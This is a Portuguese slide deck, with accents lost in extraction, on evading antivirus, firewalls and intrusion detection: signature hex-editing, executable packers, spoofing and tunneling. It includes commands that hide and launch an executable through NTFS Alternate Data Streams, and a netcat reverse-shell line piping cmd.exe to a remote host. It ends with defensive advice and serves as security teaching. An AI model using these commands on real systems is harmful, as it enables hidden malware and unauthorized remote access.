Você está na página 1de 43

Burlando Protees

Alberto Jos Pedro Maucleron Trcio

Roteiro
1 Introduo 2 Burlando o Antivrus 2.1 Alterao Hexadecimal 2.2 Apagando Recursos do Executvel 2.3 Compresso de Executveis 2.4 Alternate Data Streams 3 Burlando Firewalls 3.1 Servidores Proxy 3.2 Spoofing 3.3 IP Spoofing No Cego 3.4 IP Spoofing Cego 3.5 Sterm 3.6 Netwox 3.7 DNS Spoofing 3.8 Conexo Reversa 3.9 Tunneling 4 Burlando o IDS 5 Soluo 5.1 Burlar o Antivirus 2.2 Burlar o Firewall 5.3 Burlar o IDS

Introduo
Checar protees do Sistema Alvo Descobrir como Burlar Ferramentas para Burlar:
Antivrus Firewall IDS

Se contornados, no abriro caminho para novos ataques

1 - Burlando o Antivirus
Impedir que um programa malicioso seja detectado pelos antivrus de hoje Praticamente todo mundo usa Antivrus

1.2 Alterao Hexa Decimal


Os Antivrus precisam ter um processo de execuo cada vez mais rpido Analisar uma sequencia de caracteres dentro do arquivo
E se modificarmos esta sequencia especfica de caracteres ?

Editor Hexa Decimal


XVI32
Ex: Arquivo com Vrus Seq: 54 B2 5C 4D 5F Alterando o Cdigo Hexa Decimal Seq: 4D 54 5C B2 5F

1.2 Apagando Recursos do Executvel


Ferramenta: PE Explorer Editor de Recursos Que tipos de Recursos?
De Strings at Imagens Trechos de cdigos e formulrios que podem ser facilmente alterados

1.2 Apagando Recursos do Executvel


No apenas programas executveis DLLs

1.3 Compresso de Executveis


No do tipo ZIP, RAR etc. um programa que comprime os recursos do prprio executvel Programas que realizam essa tarefa:
UPX Petite Aspack Mew

Como o Norton Antivrus se comportaria com um arquivo comprimido pelo Petite, por exemplo?

1.4 Alternate Data Streams


Existe graas ao sistema de arquivos NTFS das verses mais recentes do Windows Stream de dados que pode ser adicionado a algum arquivo j existente Como fazer?
O conceito simples, s separar o arquivo principal do stream de dados atravs de ( : ) , dois pontos. Seria ento algo como -> marcos.jpg:arquivo.doc , por exemplo.

1.4 Alternate Data Streams Exemplo


1 - C:\MARCOS> type esse texto estar oculto > comentrios.txt:oculto.txt 2 - C:\MARCOS> type c:\windows\system32\calc.exe > comentrios.txt:secreto.exe E para executar isso?

3 - C:\MARCOS> start c:\MARCOS\comentarios.txt:secreto.exe

2 - Burlando Firewalls

Firewall configurado para uma excelente proteo de fora para dentro Deixa passar apenas conexes a servidores
Web Correio Eletrnico Algum tipo de servio remoto que possua autenticao segura como SSH

Tambm pode ser usado para barrar apenas endereos especficos. Exemplo:
Site da NASA

2.1 Servidores Proxy


Navegar anonimamente ou se passando por outra mquina Quem utiliza o proxy, passa a ter um endereo IP diferente Assim, todo site visitado registraria o IP do Proxy e no o do usurio que est navegando Onde conseguir ?
http://www.proxy4free.com http://www.publicproxyservers.com

2.1 Servidores Proxy Proxy4Free (http://www.proxy4free.com)

2.1 Servidores Proxy Como usar ?

2.2 - Spoofing

a arte de criar informaes de rede falsas Propsitos:


Evitar ser capturado nos logs do sistema Realizar scaneamentos Ganhar acesso a mquinas protegidas

Exemplo:

Uma mquina da rede interna s aceita comunicar-se com o endereo IP 192.168.0.1 e o seu 192.168.0.110. Voc no poderia mudar o seu endereo, isso criaria um conflito na rede. Mas voc poderia utilizar o IP Spoofing, uma das tcnicas mais usadas para personificar quem voc no .

2.2 Spoofing Tipos de Spoofing


ARP Spoofing DNS Spoofing IP Spoofing
Spoofing Cego Spoofing No-Cego

2.2.1 IP Spoofing No-Cego


Ao realizar um IP Spoofing modifica-se o pacote a ser enviado Coloca-se outro endereo que no seja o da prpria mquina O pacote vai at seu destino e ser processado de alguma maneira e retornar uma resposta Como ver a resposta, j que o endereo que est na informao enviada no o nosso? Se est sendo usada uma rede local, basta usar um Sniffer (Farejar a Rede) E por que se chama Spoofing No-Cego ?

2.2.2 IP Spoofing Cego


utilizado fora de uma rede local No possvel farejar o trfego de resposta til apenas se no for preciso receber o pacote de volta Exemplos
Enviar E-mails Realizar Denial Of Service

Sabendo o endereo IP certo e enviando os comandos necessrios possvel configurar alguma configurao de Firewall Acesso Posterior mquina

2.2.3 - Sterm
primeira apenas um cliente Telnet comum Porm, o mais poderoso programa de realizao de IP Spoofing para o Sistema Windows Consegue realizar um Spoofing Full-Duplex Ao realizar-se uma conexo, como se estivesse em uma sesso de Telnet

1 3

2.2.4 - Netwox
Sute de Ferramentas teis de sistema e rede Disponvel para diversas plataformas Realiaza desde tarefas simples como
Acessar um FTP, Telnet ou HTTP, Gerar hashs MD5 Testar se algum diretrio seguro Sniffar a Rede Traar Rotas Pingar Spoofing e Pacotes ICMP, Ethernet, UDP, TCP, DNS e IP

Possui ao todo 216 funes das mais diversas

2.2.4 Netwox Menu Principal

2.2.5 DNS Spoofing


Consiste em interceptar o trfego da rede e utilizar respostas forjadas para requisies DNS dos clientes Sempre que a vtima tentar se conectar ao endereo por exemplo, http://www.microsoft.com, ser enviada para o endereo IP http://www.linux.org ou qualquer outro Um programa que faz isso de forma fcil o Ettercap, com um de seus plugins possvel fazer o DNS Spoofing Ele ir envenenar o cache arp de todas as mquinas da rede, fazendo o trfego passar por sua mquina

2.2.5 DNS Spoofing Etercap

3.8 Conexo Reversa


s vezes precisamos colocar uma porta dos fundos em algum sistema e acessar remotamente. Mas o que dizer das redes internas, por exemplo? Como acessar um sistema que possui endereo IP privado? Ou sistemas no qual o firewall filtra quase tudo que entra, deixando pouqussimas brechas a serem exploradas?

3.8 Conexo Reversa

Se no conseguirmos nos conectar a algum dentro dessa barreira, podemos fazer o contrrio: O prprio programa se conectar ao nosso sistema de volta, burlando, assim, a maioria dos filtros de segurana, permitindo que acessemos endereos privados. Como fazer? -Utilizamos o NetCat;

3.8 Conexo Reversa (NetCat)

3.8 Conexo Reversa (NetCat)

3.8 Conexo Reversa (NetCat)


Comandos:

nc 10.125.0.136 53 | cmd.exe | nc 10.125.0.136 79

3.9 Tunneling

Vamos falar aqui sobre a habilidade de se conseguir realizar conexes TCP atravs de um servidor proxy. Quando uma conexo HTTP realizada atravs de um proxy, o cliente (geralmente o navegador) envia o pedido ao proxy. Este, abre a conexo com o destino, envia o pedido, recebe a resposta e envia de volta ao cliente.

3.9 Tunneling
HTTP Tunnel

3.9 Tunneling

4 Burlando o IDS
Sistema de deteco de intrusos ou simplesmente IDS refere-se a meios tcnicos de descobrir em uma rede quando esta est tendo acessos no autorizados que podem indicar a ao de um cracker ou at mesmo funcionrios mal intencionados. O Objetivo de ataques ao IDS modificar o pedidode tal maneira que os sistemas de deteco ficaro confusos, mas o servidor Web ainda conseguir entender o que estamos pedindo.

4 Burlando o IDS
Syhunt

Soluo 5.1 Burlar o Antivrus


Voc no pode confiar 100% nos softwares de antivrus; instale um firewall pessoal e veja se ele detecta alguma porta aberta que no deveria estar l; monitoradores de registros para verificar entradas suspeitas; monitoradores de conexes

Soluo 5.2 Burlar o Firewall


Tente somente permitir o acesso externo a servidores Web atravs de um proxy; Utilize programas que detectem presena de ARP poisoning na rede interna; baixar algumas regras novas para o IDS; A opo perfeita, seria permitir que o proxy acessasse somente endereos especficos (bancos, site da empresa, alguns sites de e-mail etc.) e bloqueasse todo o resto.

Soluo 5.3 Burlar o IDS


Esteja sempre atualizando as regras do IDS, definindo regras personalizadas para o seu ambiente corporativo e instalando mdulos extras no sistema de deteco de intrusos, se disponveis.